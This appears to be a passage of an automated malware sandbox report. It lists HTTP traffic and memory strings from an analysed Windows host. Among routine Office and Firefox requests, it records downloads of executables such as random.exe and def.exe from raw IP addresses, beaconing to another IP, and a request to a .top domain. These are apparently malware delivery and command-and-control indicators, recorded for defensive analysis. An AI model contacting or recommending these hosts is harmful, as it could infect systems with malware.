Source: global traffic HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 00000019.00000002.2835923520.00000209A4A2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2835923520.00000209A4A2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || 'www.' || :strippedURL AND :prefix || 'www.' || :strippedURL || X'FFFF'[{incognito:null, tabId:null, types:["main_frame"], urls:["*://login.microsoftonline.com/*", "*://login.microsoftonline.us/*"], windowId:null}, ["blocking"]]The number of recent visits to sample when calculating the ranking of a page. Examining all the visits would be expensive, so we only sample recent visits.moz-extension://071e0a34-7cfe-4654-91b9-8996c51e5851/selector/callBackground.jsmoz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/messaging_helper.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || 'www.' || :strippedURL AND :prefix || 'www.' || :strippedURL || X'FFFF'[{incognito:null, tabId:null, types:["main_frame"], urls:["*://login.microsoftonline.com/*", "*://login.microsoftonline.us/*"], windowId:null}, ["blocking"]]The number of recent visits to sample when calculating the ranking of a page. Examining all the visits would be expensive, so we only sample recent visits.moz-extension://071e0a34-7cfe-4654-91b9-8996c51e5851/selector/callBackground.jsmoz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/messaging_helper.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || 'www.' || :strippedURL AND :prefix || 'www.' || :strippedURL || X'FFFF'[{incognito:null, tabId:null, types:["main_frame"], urls:["*://login.microsoftonline.com/*", "*://login.microsoftonline.us/*"], windowId:null}, ["blocking"]]The number of recent visits to sample when calculating the ranking of a page. Examining all the visits would be expensive, so we only sample recent visits.moz-extension://071e0a34-7cfe-4654-91b9-8996c51e5851/selector/callBackground.jsmoz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/messaging_helper.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://c.amazon-adsystem.com/aax2/apstag.js*://pub.doubleverify.com/signals/pub.js*FileUtils_openAtomicFileOutputStream*://track.adform.net/serving/scripts/trackpoint/pictureinpicture%40mozilla.org:1.0.0@mozilla.org/network/safe-file-output-stream;1*://*.imgur.io/js/vendor.*.bundle.js@mozilla.org/network/atomic-file-output-stream;1*://*.imgur.com/js/vendor.*.bundle.js*://cdn.branch.io/branch-latest.min.js**://static.chartbeat.com/js/chartbeat.jsFileUtils_openSafeFileOutputStream*://web-assets.toggl.com/app/assets/scripts/*.jshttps://smartblock.firefox.etp/facebook.svgwebcompat-reporter@mozilla.org.xpiwebcompat-reporter%40mozilla.org:1.5.1FileUtils_closeSafeFileOutputStream*://www.google-analytics.com/gtm/js**://www.googletagmanager.com/gtm.js**://www.google-analytics.com/plugins/ua/ec.js*://ssl.google-analytics.com/ga.js*://s0.2mdn.net/instream/html5/ima3.js*://www.googletagservices.com/tag/js/gpt.js**://static.adsafeprotected.com/iasPET.1.js*://www.google-analytics.com/analytics.js**://adservex.media.net/videoAds.js**://pagead2.googlesyndication.com/tag/js/gpt.js**://*.moatads.com/*/moatheader.js**://cdn.optimizely.com/public/*.js*://*.vidible.tv/*/vidible-min.js**://s.webtrends.com/js/advancedLinkTracking.js*://js.maxmind.com/js/apis/geoip2/*/geoip2.js*://s.webtrends.com/js/webtrends.js*://cdn.adsafeprotected.com/iasPET.1.js*://imasdk.googleapis.com/js/sdkloader/ima3.js*://s.webtrends.com/js/webtrends.min.jsUnknown sender or wrong actor for recv equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://pagead2.googlesyndication.com/pagead/*.js*fcd=true*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=trueC:\Program Files\Mozilla Firefox\browser\features*://id.rambler.ru/rambler-id-helper/auth_events.js*://www.gstatic.com/firebasejs/*/firebase-messaging.js*https://static.adsafeprotected.com/firefox-etp-pixel@mozilla.org/uriloader/external-protocol-service;1 equals www.rambler.ru (Rambler)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://vast.adsafeprotected.com/vast**://securepubads.g.doubleclick.net/gampad/*ad**://pubads.g.doubleclick.net/gampad/*ad-blk**://www.facebook.com/platform/impression.php**://trends.google.com/trends/embed*sessionstore.closedTabsFromAllWindows equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style 